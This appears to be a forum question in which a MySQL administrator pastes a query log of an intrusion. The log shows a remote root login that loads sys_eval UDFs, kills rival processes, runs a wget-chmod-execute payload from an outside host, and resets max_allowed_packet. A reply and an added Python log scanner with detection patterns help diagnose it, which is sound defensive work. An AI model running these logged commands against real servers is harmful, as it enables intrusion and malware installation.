Whenever I change max_allowed_packet, it gets reset after a few hours. When I checked the query log, I found the following queries, but I am unable to figure out which application or process executes these queries. Does anyone know what this is about? Or is it MySQL itself?
161020 3:09:34 723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_get RETURNS string SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_set RETURNS int SONAME 'ptfuki32.so'
161020 3:09:35 723 Query CREATE FUNCTION sys_exec RETURNS int SONAME 'ptfuki32.so'
723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:36 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
161020 3:09:37 723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Query select sys_eval('cd /usr;cd lib;cd mysql;cd plugin;dir;chmod 0777 bczcbv;./bczcbv')
723 Quit
724 Connect root@ip on mysql
161020 3:09:38 724 Query SHOW VARIABLES LIKE '%compile_os%'
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
161020 3:09:39 724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('ps -ef | grep lz1|grep -v grep|cut -c 9-15|xargs kill -9')
724 Query select sys_eval('killall -9 .sshd')
724 Query select sys_eval('killall -9 .sh')
161020 3:09:40 724 Query select sys_eval('killall -9 and1')
724 Query select sys_eval('killall -9 cisco')
724 Query select sys_eval('killall -9 ciscoh')
724 Query select sys_eval('killall -9 L24')
724 Query select sys_eval('killall -9 L26')
161020 3:09:41 724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Query select sys_eval('chmod 777 http://ip:5555;')
724 Query select sys_eval('./http://ip:5555;')
724 Query select sys_eval('kill str=`netstat -anept 2>/dev/null |grep -E ':(68866|7583|2222|10711|6009|10991|10771|7168|7668|36000|36001|25000|25001|25002)'|cut -d / -f 1`')
724 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
161020 3:09:42 724 Query select sys_eval('wget http://ip4:5555/v9mm;chmod 777 v9mm;./v9mm;')
724 Quit
725 Connect root@ip on mysql
725 Query SHOW VARIABLES LIKE '%compile_os%'
161020 3:09:43 725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
725 Query select sys_eval('wget http://ip:5555/v9mm;chmod 777 v9mm;./v9mm;')
725 Query FLUSH PRIVILEGES
161020 3:09:44 725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
725 Query DROP FUNCTION IF EXISTS sys_set
161020 3:09:45 725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
161020 3:09:46 725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Query DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
725 Query DROP FUNCTION IF EXISTS sys_get
161020 3:09:47 725 Query DROP FUNCTION IF EXISTS sys_set
725 Query DROP FUNCTION IF EXISTS sys_exec
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query DROP FUNCTION IF EXISTS cmdshell
725 Query set global log_bin_trust_function_creators=0
161020 3:09:48 725 Query SET GLOBAL log_bin_trust_function_creators=FALSE
725 Query SET GLOBAL log_bin_trust_routine_creators=0
725 Query SET GLOBAL max_allowed_packet=1024
725 Query FLUSH PRIVILEGES
725 Quit
It seems someone has attacked my MySQL server with SQL injection. cna12.dll is a malware file. Check the link below to prevent such attacks: https://malwaremusings.com/2013/02/14/how-to-protect-yourself-from-the-cna12-dll-mysql-attacks/
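
As an added example (not part of the original question or answer), the following sketch scans an old-style MySQL general query log for the statement types seen above: UDF loading via `SONAME`, calls to `sys_eval`/`sys_exec`/`cmdshell`, `SET GLOBAL` changes and UDF drops, grouped by connection id and login. The rule names and the `scan` function are assumptions made for this example, and `SAMPLE` is a shortened excerpt built from the log lines quoted above.

```python
import re
from collections import Counter

# Old-style general log line: optional "YYMMDD H:MM:SS", thread id, command, argument.
LINE = re.compile(r"^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?(\d+)\s+(Connect|Query|Quit)\s*(.*)$")

# Hypothetical rule names; each pattern exposes two groups used as the finding detail.
RULES = [
    ("udf_load", re.compile(r"CREATE\s+FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)),
    ("os_command", re.compile(r"\b(sys_eval|sys_exec|cmdshell)\s*\((.*)\)", re.I)),
    ("global_change", re.compile(r"SET\s+GLOBAL\s+(\w+)\s*=\s*(\S+)", re.I)),
    ("udf_drop", re.compile(r"DROP\s+FUNCTION\s+(?:IF\s+EXISTS\s+)?(\w+)()", re.I)),
]

def scan(log_text):
    """Return (findings, accounts).

    findings counts (thread_id, rule, detail) so repeated statements collapse;
    accounts maps thread_id -> login taken from that thread's Connect line.
    """
    findings, accounts = Counter(), {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # not a general-log statement line
        thread, command, arg = m.groups()
        if command == "Connect":
            accounts[thread] = arg.split(" on ")[0]
            continue
        for rule, pattern in RULES:
            hit = pattern.search(arg)
            if hit:
                detail = f"{hit.group(1)} {hit.group(2)}".strip()
                findings[(thread, rule, detail)] += 1
                break
    return findings, accounts

# Shortened excerpt constructed from the log quoted on this page.
SAMPLE = """\
161020 3:09:35 723 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'ptfuki32.so'
723 Quit
724 Connect root@ip on mysql
724 Query select sys_eval('killall -9 cisco')
724 Query select sys_eval('killall -9 cisco')
725 Connect root@ip on mysql
725 Query DROP FUNCTION IF EXISTS sys_eval
725 Query SET GLOBAL max_allowed_packet=1024
"""

if __name__ == "__main__":
    findings, accounts = scan(SAMPLE)
    for (thread, rule, detail), count in findings.items():
        print(thread, accounts.get(thread, "?"), rule, detail, f"x{count}")
```

Run over the full log, this attributes the `SET GLOBAL max_allowed_packet=1024` statement to connection 725, whose Connect line shows a remote login as root. Listing the rows of `mysql.func` on the server shows which UDFs are currently registered and which shared library each one loads.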